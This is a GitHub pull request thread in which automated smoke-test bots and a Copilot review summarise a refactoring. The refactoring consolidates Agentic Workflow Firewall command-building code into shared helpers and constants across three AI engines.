• ✅ File I/O
• ✅ Build System
• ✅ Discussion Interaction
• ✅ PR Review

Overall: PASS ✅

§22027664550

AI generated by Smoke Copilot

[github-actions]

Excellent refactoring - consolidates AWF command building into shared helpers and extracts AWF constants. All engines now use consistent configuration.

📰 BREAKING: Report filed by Smoke Copilot for issue #15810

[github-actions]

Good consolidation! BuildAWFCommand nicely unifies AWF setup across all engines.

[github-actions]

Nice extraction of AWF constants - much cleaner than hardcoded values.

[github-actions]

📰 VERDICT: Smoke Copilot has concluded. All systems operational. This is a developing story. 🎤

[Copilot]

Pull request overview

This PR consolidates duplicated AWF (Agentic Workflow Firewall) command building logic from Claude, Codex, and Copilot engines into a shared helper module. The refactoring reduces ~275 lines of duplicated code across three engines while extracting common constants for maintainability.

Changes:

• Created new pkg/workflow/awf_helpers.go with reusable AWF command building functions
• Extracted AWF-related constants to pkg/constants/constants.go
• Refactored Claude, Codex, and Copilot engines to use the shared helpers
• Recompiled 113 workflow lock files with consistent command wrapping (/bin/bash -c wrapper and tee -a flag)

Reviewed changes

Copilot reviewed 119 out of 119 changed files in this pull request and generated no comments.

File	Description
pkg/constants/constants.go	Added 7 environment variable constants and 3 AWF configuration constants
pkg/workflow/awf_helpers.go	New module with AWF command building helpers (248 lines)
.github/workflows/*.lock.yml	113 workflow lock files updated with consistent AWF command format
.changeset/patch-consolidate-awf-command.md	Changeset documenting the refactoring

---

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.